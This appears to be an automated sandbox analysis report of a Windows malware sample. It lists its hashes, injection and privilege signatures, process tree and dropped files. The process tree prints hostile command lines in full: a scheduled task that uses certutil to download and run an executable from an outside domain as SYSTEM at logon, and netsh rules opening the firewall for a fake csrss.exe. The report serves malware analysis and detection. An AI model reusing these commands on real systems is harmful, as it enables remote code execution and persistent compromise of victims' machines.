Analysis
- max time kernel: 32s
- max time network: 164s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 23-05-2022 21:03
Static task: static1
Behavioral task: behavioral1
- Sample: cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
- Resource: win10v2004-20220414-en
General
- Target: cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
- Size: 3.9MB
- MD5: 865660822e59b4e6dfbbc1558adc33bf
- SHA1: 327c98174279ecdd472ad263748723207293b704
- SHA256: cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5
- SHA512: 4bfe2015c0d4d4c5ed1fa5860a207e635e8ea8bd639a47680a477ece2b861a7b83f227e5e5ec96145ff23784cdbf9fcd3e940c7af4d396ac66fa02be30835d17
Malware Config
Signatures
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  Processes (description | pid | process | target process):
  PID 4308 created 4440 | 4308 | svchost.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
- Modifies Windows Firewall (1 TTPs)
- Modifies boot configuration data using bcdedit (1 IoCs)
  Processes (pid | process):
  1656 | bcdedit.exe
- Suspicious use of SetThreadContext (2 IoCs)
  Processes (description | pid | process | target process):
  PID 4724 set thread context of 4440 | 4724 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 2684 set thread context of 4580 | 2684 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes (pid | process):
  4536 | schtasks.exe
  4648 | schtasks.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid | process):
  4440 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  4440 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 4440 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  Token: SeImpersonatePrivilege | 4440 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  Token: SeTcbPrivilege | 4308 | svchost.exe
  Token: SeTcbPrivilege | 4308 | svchost.exe
- Suspicious use of WriteProcessMemory (23 IoCs)
  Processes (description | pid | process | target process):
  PID 4724 wrote to memory of 4440 | 4724 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4724 wrote to memory of 4440 | 4724 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4724 wrote to memory of 4440 | 4724 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4724 wrote to memory of 4440 | 4724 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4724 wrote to memory of 4440 | 4724 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4724 wrote to memory of 4440 | 4724 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4724 wrote to memory of 4440 | 4724 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4724 wrote to memory of 4440 | 4724 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4724 wrote to memory of 4440 | 4724 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4724 wrote to memory of 4440 | 4724 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4308 wrote to memory of 2684 | 4308 | svchost.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4308 wrote to memory of 2684 | 4308 | svchost.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 4308 wrote to memory of 2684 | 4308 | svchost.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 2684 wrote to memory of 4580 | 2684 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 2684 wrote to memory of 4580 | 2684 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 2684 wrote to memory of 4580 | 2684 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 2684 wrote to memory of 4580 | 2684 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 2684 wrote to memory of 4580 | 2684 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 2684 wrote to memory of 4580 | 2684 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 2684 wrote to memory of 4580 | 2684 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 2684 wrote to memory of 4580 | 2684 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 2684 wrote to memory of 4580 | 2684 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  PID 2684 wrote to memory of 4580 | 2684 | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe | cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
Processes (process tree; nesting shows parent/child depth)
- C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"
        - C:\Windows\system32\cmd.exe
          Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        - C:\Windows\system32\cmd.exe
          Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"
        - C:\Windows\rss\csrss.exe
          Command line: C:\Windows\rss\csrss.exe ""
          - C:\Windows\rss\csrss.exe
            Command line: C:\Windows\rss\csrss.exe ""
            - C:\Windows\SYSTEM32\schtasks.exe
              Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://hotgifts.online/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              - Creates scheduled task(s)
            - C:\Windows\SYSTEM32\schtasks.exe
              Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              - Creates scheduled task(s)
            - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
            - C:\Windows\system32\bcdedit.exe
              Command line: C:\Windows\Sysnative\bcdedit.exe /v
              - Modifies boot configuration data using bcdedit
- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\netsh.exe
  Command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
- C:\Windows\system32\netsh.exe
  Command line: netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes
Downloads
- C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 451KB
  MD5: a8141c48a5c4d6fa922a48ea52f2dfa1
  SHA1: 5fbf2a15ba1fa73c2e8dd9fa6a5788d46878fa29
  SHA256: 79d74fe2cde63003726ac36009806c3132101e6e91781a68ac73ff21d91cb547
  SHA512: 41861acb5e56b46efd8d5e921036e5d63e6f53306c815d57cfbc4ea2a4c0fe4a38f755c85798b0d35318497227a4344df3febfd27a1dadc16aeba8cfcd1f8b28
- C:\Windows\rss\csrss.exe
  Filesize: 548KB
  MD5: c5332ac2123f881a0706cb3c00159805
  SHA1: dce70dafe3920350e3d71f2cbd6b9a02a69b66c1
  SHA256: 90e59203d3aafb2e3700a05a3947350be1eac5ac0db9acbc0b47dc21c27562c7
  SHA512: f97cc405c275e8281864a9d67823d918c4ff92200f81934c7a886a78056a2879eb43f44fc180e55ddd5de70937be6ad3d4d8216c38e61f3262494a7c59144125
- C:\Windows\rss\csrss.exe
  Filesize: 581KB
  MD5: a3ad9497b6c0cfad8f404d6857c9bcac
  SHA1: cbe94f26690d735d2b8939aa4410501b65dc4d37
  SHA256: 715560cf4950ae3fcfbb87c849670166f1abf18a0ff5048ec5c3ad837c967b85
  SHA512: 206b7a4b0f7ffa946ae115d1c2ffccd1553647c74de510ffe063cb309f4ce0b0bd49ddc019e33e058e68bea669c21a852d079bc4dbd0ab428fb0d1b86383de71
- C:\Windows\rss\csrss.exe
  Filesize: 486KB
  MD5: 364a6e67d4dc7f6c2c10394690b67d13
  SHA1: cf0a083d8eabe8d7e4ebee5fc17c59640758e3aa
  SHA256: 3b671ed045aaa7f3128e9c7e32bbb84dd710810c7833322b3accb484f13426b8
  SHA512: f95db26c1ad2908090c73142d90efae9c3b64dccfe95881cb37f447cc8761e2ade3e32c29cb02bcc83c2e21e5be7612923e25321e499731c087422074448d5c3
Memory dumps
- memory/1176-160-0x0000000000000000-mapping.dmp
- memory/1308-155-0x0000000002A00000-0x0000000002DA6000-memory.dmp (Filesize: 3.6MB)
- memory/1308-148-0x0000000000000000-mapping.dmp
- memory/1656-162-0x0000000000000000-mapping.dmp
- memory/2684-137-0x0000000000000000-mapping.dmp
- memory/2684-138-0x0000000002597000-0x000000000293D000-memory.dmp (Filesize: 3.6MB)
- memory/3176-144-0x0000000000000000-mapping.dmp
- memory/3600-143-0x0000000000000000-mapping.dmp
- memory/4140-145-0x0000000000000000-mapping.dmp
- memory/4440-133-0x0000000000400000-0x0000000000B0F000-memory.dmp (Filesize: 7.1MB)
- memory/4440-131-0x0000000000000000-mapping.dmp
- memory/4440-136-0x0000000000400000-0x0000000000B0F000-memory.dmp (Filesize: 7.1MB)
- memory/4440-135-0x0000000000400000-0x0000000000B0F000-memory.dmp (Filesize: 7.1MB)
- memory/4536-158-0x0000000000000000-mapping.dmp
- memory/4560-146-0x0000000000000000-mapping.dmp
- memory/4580-147-0x0000000000400000-0x0000000000B0F000-memory.dmp (Filesize: 7.1MB)
- memory/4580-139-0x0000000000000000-mapping.dmp
- memory/4648-157-0x0000000000000000-mapping.dmp
- memory/4724-130-0x00000000026A6000-0x0000000002A4C000-memory.dmp (Filesize: 3.6MB)
- memory/4724-132-0x0000000002A50000-0x0000000003145000-memory.dmp (Filesize: 7.0MB)
- memory/4768-159-0x0000000000400000-0x0000000000B0F000-memory.dmp (Filesize: 7.1MB)
- memory/4768-151-0x0000000000000000-mapping.dmp